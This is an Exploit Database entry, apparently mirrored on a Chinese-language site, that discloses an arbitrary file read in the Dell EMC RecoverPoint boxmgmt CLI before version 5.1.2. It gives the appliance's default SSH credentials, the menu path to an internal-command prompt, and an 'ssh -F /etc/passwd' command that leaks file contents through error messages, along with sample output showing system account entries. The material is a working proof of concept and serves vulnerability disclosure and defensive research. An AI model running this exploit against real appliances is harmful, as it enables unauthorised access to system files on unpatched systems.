Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read

• Exploit Database
• 14 阅读

• 作者： Paul Taylor
  日期： 2018-05-22
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/44688/

• # Exploit Title: Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read
  # Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
  # Date: 2018-05-21
  # Vendor Advisory: DSA-2018-095
  # Vendor KB: https://support.emc.com/kb/521234
  # Exploit Author: Paul Taylor
  # Github: https://github.com/bao7uo/dell-emc_recoverpoint
  # Website: https://www.foregenix.com/blog/foregenix-identify-dell-emc-recoverpoint-zero-day-vulnerabilities
  # Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
  # CVE: N/A
   
  # 1. Description
  # When logging in as boxmgmt and running an internal command, the ssh command may be used
  # to display the contents of files from the file system which are accessible to the boxmgmt user.
   
  # 2. Proof of Concept
  # Log in as boxmgmt via SSH (default credentials boxmgmt/boxmgmt)
  # Select [3] Diagnostics
  # Select [5] Run Internal Command
  # ssh -F /etc/passwd 127.0.0.1
  
  test-cluster: 5
  This is the list of commands you are allowed to use: ALAT NetDiag arp arping date ethtool kps.pl netstat ping ping6 ssh telnet top uptime
  Enter internal command: ssh -F /etc/passwd 127.0.0.1
  /etc/passwd: line 1: Bad configuration option: root:x:0:0:root:/root:/bin/tcsh
  /etc/passwd: line 2: Bad configuration option: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  /etc/passwd: line 3: Bad configuration option: bin:x:2:2:bin:/bin:/usr/sbin/nologin
  <SNIP>
  /etc/passwd: terminating, 34 bad configuration options
  Command "ssh -F /etc/passwd 127.0.0.1" exited with return code 65280